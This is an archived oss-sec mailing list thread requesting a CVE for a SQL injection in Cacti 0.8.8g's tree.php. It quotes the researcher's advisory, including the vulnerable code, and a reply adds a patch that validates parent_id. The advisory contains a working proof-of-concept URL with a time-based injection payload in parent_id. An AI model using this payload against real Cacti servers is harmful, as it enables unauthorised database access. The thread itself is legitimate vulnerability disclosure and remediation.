oss-sec mailing list archives

Re: please assign CVE for cacti bug 2667: SQL Injection Vulnerability

From: Tim Zingelman <tez () pkgsrc org>
Date: Tue, 15 Mar 2016 15:27:05 -0500

This seems to fix it...

diff -u tree.php.orig tree.php
--- tree.php.orig       2016-03-15 15:15:37.646641203 -0500
+++ tree.php    2016-03-15 15:19:45.966120414 -0500
@@ -153,6 +153,7 @@
        /* ================= input validation ================= */
        input_validate_input_number(get_request_var("id"));
        input_validate_input_number(get_request_var("tree_id"));
+       input_validate_input_number(get_request_var("parent_id"));
        /* ==================================================== */

        if (!empty($_GET["id"])) {



On Thu, Mar 10, 2016 at 10:06 AM, Paul Gevers <elbrus () debian org> wrote:

Hi

I just found the description below about an sql vulnerability in the
cacti bug tracker: http://bugs.cacti.net/view.php?id=2667

Can a CVE be assigned for this issue?
Thanks

==========================
Advisory: Cacti SQL Injection Vulnerability
Author: Do9gy of Tencent Security Platform Department
Affected Version: 0.8.8.g(the latest version & the older versions)
==========================
Vulnerability Description
==========================

Recetly, I found a SQL Injection Vulnerability in ‘Cacti-0.8.8g'
program, Cacti is widely used in many companies.
Vulnerable file: /cacti/tree.php:
line 208:
==========================================================================================================================================
    switch ($current_type) {
    case TREE_ITEM_TYPE_HEADER:
        $i = 0;
        /* it's nice to default to the parent sorting style for new items */
        if (empty($_GET["id"])) {
            $default_sorting_type = db_fetch_cell("select
sort_children_type from graph_tree_items where id=" . $_GET["parent_id"]);
        }else{
            $default_sorting_type = TREE_ORDERING_NONE;
        }

==========================================================================================================================================

The parameter parent_id is used without any validation.
==========================
POC && EXP
==========================
1. Login

2.
http://target/cacti-0.8.8g/tree.php?action=item_edit&tree_id=2&parent_id=8%20and%20sleep(1)
[^]

3. mysql log: select sort_children_type from graph_tree_items where id=8
and sleep(1)

Current thread:

please assign CVE for cacti bug 2667: SQL Injection Vulnerability Paul Gevers (Mar 10)
- Re: please assign CVE for cacti bug 2667: SQL Injection Vulnerability Tim Zingelman (Mar 15)
- Re: please assign CVE for cacti bug 2667: SQL Injection Vulnerability cve-assign (Mar 15)